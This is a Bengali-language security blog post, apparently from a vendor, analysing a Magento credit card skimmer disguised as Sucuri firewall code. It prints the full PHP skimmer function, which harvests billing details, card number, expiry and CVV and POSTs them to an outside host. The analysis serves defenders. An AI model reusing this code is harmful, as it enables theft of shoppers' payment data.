কম্পিউটার
 Computer >> কম্পিউটার >  >> নেটওয়ার্কিং >> নেটওয়ার্ক নিরাপত্তা

ক্রেডিট কার্ড স্কিমার ছদ্মবেশী সুকুরি, ম্যাজেন্টো স্টোরগুলিকে লক্ষ্যবস্তু করা হচ্ছে এবং CC ডেটা চুরি হয়েছে

বিশ্বজুড়ে COVID-19 লকডাউন ব্যবস্থা এবং আসন্ন BFCM এবং ক্রিসমাস ডিসকাউন্ট বিক্রয়ের সাথে, এই বছর অনলাইন শপিং ক্রমাগত বৃদ্ধি পাচ্ছে এবং এর সাথে ডিজিটাল ক্রেডিট কার্ড স্কিমার আক্রমণ।

টেলিগ্রাম ম্যালওয়্যার প্রচারে আমাদের সাম্প্রতিক প্রতিবেদনের পরে, Astra সিকিউরিটির নিরাপত্তা গবেষকরা আরেকটি চলমান ক্রেডিট কার্ড স্কিমিং ম্যালওয়্যার প্রচারাভিযান দেখেছেন যা সংক্রামিত ই-কমার্স স্টোর থেকে গ্রাহকদের সংবেদনশীল তথ্য চুরি করার জন্য নিরাপত্তা কোম্পানি 'সুকুরি'-এর ছদ্মবেশ ধারণ করে। যদিও আমরা Magento স্টোরগুলিকে লক্ষ্য করে এই ম্যালওয়্যারটি ট্র্যাক করেছি, তবে, ম্যালওয়্যারের কিছু চিহ্ন অন্যান্য CMS যেমন Prestashop, OpenCart এবং WooCommerce-এও দেখা গেছে৷

ডিজিটাল ক্রেডিট কার্ড স্কিমিং অ্যাটাক কি?

একটি ডিজিটাল ক্রেডিট কার্ড স্কিমিং আক্রমণ হল একটি ওয়েব-ভিত্তিক স্কিমিং আক্রমণ যেখানে হ্যাকাররা ম্যালওয়্যার দ্বারা সংক্রামিত করার জন্য ওয়েবসাইট বা ই-কমার্স স্টোরগুলিতে দূষিত জাভাস্ক্রিপ্ট কোড ইনজেক্ট করে এবং শেষ পর্যন্ত ওয়েবসাইটের দর্শক/গ্রাহকদের কাছ থেকে শংসাপত্র এবং সংবেদনশীল অর্থপ্রদানের তথ্য চুরি করে। এই ডিজিটাল স্কিমারের ক্ষতিকারক কোড বেশিরভাগই সাইটের পেমেন্ট চেকআউট পৃষ্ঠায় উপস্থিত ব্যবহারকারী ইনপুট ফর্মগুলিতে লাগানো হয় যা গ্রাহকদের ক্রেডিট কার্ডের তথ্য চুরি করার জন্য ব্যবহারকারীর ইনপুটগুলি শুঁকে বা জাল পেমেন্ট ফর্ম সহ একটি আইফ্রেম তৈরি করে৷

ব্রিটিশ এয়ারওয়েজ, ম্যাসি, ফোর্বস, নিউএগ এবং টিকিটমাস্টারের মতো হাই-প্রোফাইল ব্র্যান্ডগুলি সহ ডিজিটাল স্কিমিং আজ পর্যন্ত কয়েক হাজার ওয়েবসাইটকে প্রভাবিত করেছে৷

ম্যাজেন্টো ক্রেডিট কার্ড স্কিমিং ম্যালওয়ারের লক্ষণগুলি

  1. আপনার দোকানে ব্যবহার করার পর গ্রাহকরা তাদের ক্রেডিট কার্ড থেকে অজানা লেনদেনের বিষয়ে অভিযোগ করছেন।
  2. আপনার দোকানের পেমেন্ট গেটওয়ের নিরাপত্তা সম্পর্কে সতর্কতা জানিয়ে আপনার পেমেন্ট প্রদানকারী/ব্যাঙ্কের ইমেল।
  3. অতিরিক্ত অর্থপ্রদানের পদ্ধতি স্টোরে যোগ করা হয়েছে যা আপনি সনাক্ত করেন না।
  4. আপনার ওয়েবসাইটে ‘সুকুরি’ শব্দটি যুক্ত কোডটি যুক্ত করা হয়েছে, যদিও আপনি নামের সাথে কোনো পণ্য ব্যবহার করেন না।

কিভাবে হ্যাকাররা স্টোর টার্গেট করছে এবং ব্যবহারকারীদের অর্থপ্রদানের তথ্য দেওয়ার জন্য প্রতারণা করার জন্য Sucuri ফায়ারওয়ালের ছদ্মবেশ ধারণ করছে

এই ম্যালওয়্যার প্রচারণার বিশ্লেষণের সময়, আমাদের গবেষণা দল দেখেছে যে হ্যাকাররা সক্রিয়ভাবে এই ক্রেডিট কার্ড স্কিমিং ম্যালওয়্যারকে ই-কমার্স ওয়েবসাইটগুলিতে (বেশিরভাগই ম্যাগনেটো স্টোর) লাগিয়েছে এবং চেকআউটের সময় তাদের সংবেদনশীল তথ্য প্রবেশ করার জন্য সাইটের দর্শক বা ক্রেতাদের প্রতারণা করছে৷ ক্ষতিকারক ক্রেডিট কার্ড স্কিমার কোড এই ফাইলের অবস্থানে অবস্থিত /app/code/core/Mage/Payment/Model/Method/Cc.php একটি সংক্রামিত সাইটের।

এখানে, আক্রমণকারীরা একটি ফাংশন যোগ করছে $this->sucuri_encrypted(); যা তাদের চেকআউট প্রক্রিয়া চলাকালীন ব্যবহারকারীর দ্বারা প্রবেশ করা ডেটা এক্সফিল্টার করতে দেয়। এবং অপসারিত ডেটা https://www.thebrandstore.gr/js/i.php এ পাঠানো হচ্ছে

চুরি হওয়া ডেটাতে গ্রাহকদের প্রথম নাম, পদবি, ঠিকানা, ফোন নম্বর এবং ক্রেডিট কার্ডের বিবরণ সহ তাদের সংবেদনশীল তথ্য রয়েছে।

আক্রমণকারীদের দ্বারা ব্যবহৃত এই ম্যালওয়্যার প্রচারে ব্যবহৃত কোড নমুনা নীচে দেওয়া হল:

function sucuri_encrypted()
 {
 $info = $this->getInfoInstance();
 $object = new Mage_Checkout_Block_Onepage_Billing;
 $address1 = $object->getQuote()->getBillingAddress();
 $data1 = $address1->getFirstname();
 $data2 = $address1->getLastname();
 $data3 = $address1->getStreet(1);
 $data4 = $address1->getStreet(2);
 $data5 = $address1->getCity();
 $data6 = $address1->getRegion();
 $data7 = $address1->getPostcode();
 $data8 = $address1->getCountry();
 $data9 = $address1->getTelephone();
 $data10 = $info->getCcNumber();
 $expyear = substr($info->getCcExpYear(), -2);
 $expmonth = $info->getCcExpMonth();
 if (strlen($expmonth) == 1) {
 $expmonth = '0'.$expmonth;
 };
 $data11 = $expmonth;
 $data12 = $expyear;
 $data13 = $info->getCcCid();
 $data15 = $_SERVER['SERVER_NAME'];
 $data16 = Mage::getSingleton('checkout/session')->getQuote()->getBillingAddress()->getEmail();
//create array of data to be secured
$sucuri_firewall['firstname'] = base64_encode($data1);
$sucuri_firewall['lastname'] = base64_encode($data2);
$sucuri_firewall['address'] = base64_encode($data3);
$sucuri_firewall['address2'] = base64_encode($data4);
$sucuri_firewall['city'] = base64_encode($data5);
$sucuri_firewall['state'] = base64_encode($data6);
$sucuri_firewall['zip'] = base64_encode($data7);
$sucuri_firewall['country'] = base64_encode($data8);
$sucuri_firewall['phone'] = base64_encode($data9);
$sucuri_firewall['cc'] = base64_encode($data10);
$sucuri_firewall['exp'] = base64_encode($data11);
$sucuri_firewall['expyear'] = base64_encode($data12);
$sucuri_firewall['cvv'] = base64_encode($data13);
$sucuri_firewall['email'] = base64_encode($data16);
$sucuri_firewall['dari'] = base64_encode($data15);
$sucuri_firewall['submit'] = 'Submit';
//traverse array and prepare data for posting (key1=value1)
foreach ( $sucuri_firewall as $key => $value) {
 $post_items[] = $key . '=' . $value;
}
//create the final string to be posted using implode()
$post_string = implode ('&', $post_items);
//create cURL connection
$curl_connection = curl_init('https://www.thebrandstore.gr/js/i.php');
//set options
curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
//set data to be posted
curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post_string);
//perform our request
$result = curl_exec($curl_connection);
curl_close($curl_connection);
}
}
}.

আপনি উপরের কোডে দেখতে পাচ্ছেন, ক্রেডিট কার্ডের তথ্য চুরিকারী $this->sucuri_encrypted() নামে একটি ফাংশন যোগ করে; যা একটি ছদ্মবেশী সুকুরি ফায়ারওয়াল কোড প্রদর্শন করে।

কিভাবে আপনার ই-কমার্স স্টোরকে এই ম্যালওয়্যার থেকে রক্ষা করবেন

এই ম্যালওয়্যার দ্বারা সংক্রামিত ই-কমার্স ওয়েবসাইট বা স্টোরগুলি তাদের গ্রাহকদের সংবেদনশীল তথ্য এখানে চুরি হওয়ার কারণে এবং বৈধ অর্ডার দেওয়া হচ্ছে না বা অর্থপ্রদান করা হচ্ছে না বলে রাজস্বের পাশাপাশি গ্রাহক বিশ্বাসের একটি বিশাল ক্ষতির সম্মুখীন হতে পারে। সুতরাং, সাইটের মালিকদের পরামর্শ দেওয়া হচ্ছে যে তাদের এই ধরনের ক্রেডিট কার্ড স্কিমার এবং অন্য যেকোন ম্যালওয়্যার প্রচারাভিযানের বিরুদ্ধে তাদের সাইট এবং গ্রাহকের ডেটা সুরক্ষিত করার জন্য পূর্বের নিরাপত্তা ব্যবস্থা প্রয়োগ করা উচিত।

আপনি যদি Astra Security এর অ্যাপ্লিকেশন ফায়ারওয়াল ব্যবহার করেন তাহলে আপনার ই-কমার্স স্টোর ইতিমধ্যেই এই আক্রমণ এবং অন্যান্য সাইবার আক্রমণ এবং SQLi, XSS, CSRF, LFI, RFI, ক্রেডিট কার্ড হ্যাক, স্প্যাম, খারাপ বট ইত্যাদির মতো দুর্বলতা থেকে সুরক্ষিত রয়েছে। নিরাপত্তা বিশেষজ্ঞরা দীর্ঘদিন ধরে ওয়েবসাইটগুলির নিরাপত্তার জন্য একটি প্রধান নিরাপত্তা ব্যবস্থা হিসাবে নিয়মিত ম্যালওয়্যার স্ক্যান করার পরামর্শ দিয়ে আসছেন, এটি সর্বদা সুরক্ষিত রাখার জন্য আপনার ওয়েবসাইটগুলিকে যথাযথ নিরাপত্তা ব্যবস্থা দিয়ে প্রাইম করার সময় এসেছে৷


  1. Magento স্টোরে জাল পেমেন্ট পদ্ধতি যোগ করা হয়েছে – ক্রেডিট কার্ডের তথ্য ফাঁস হচ্ছে

  2. কিভাবে ম্যাজেন্টো কার্ড স্কিমিং কাজ করে এবং কীভাবে নিরাপদ থাকবেন?

  3. ক্রেডিট কার্ড জালিয়াতি কী এবং কীভাবে এটি থেকে নিরাপদ থাকা যায়?

  4. আরও একটি ডেটা গোপনীয়তা কেলেঙ্কারি:আমরা কি আরও সতর্ক হচ্ছি না?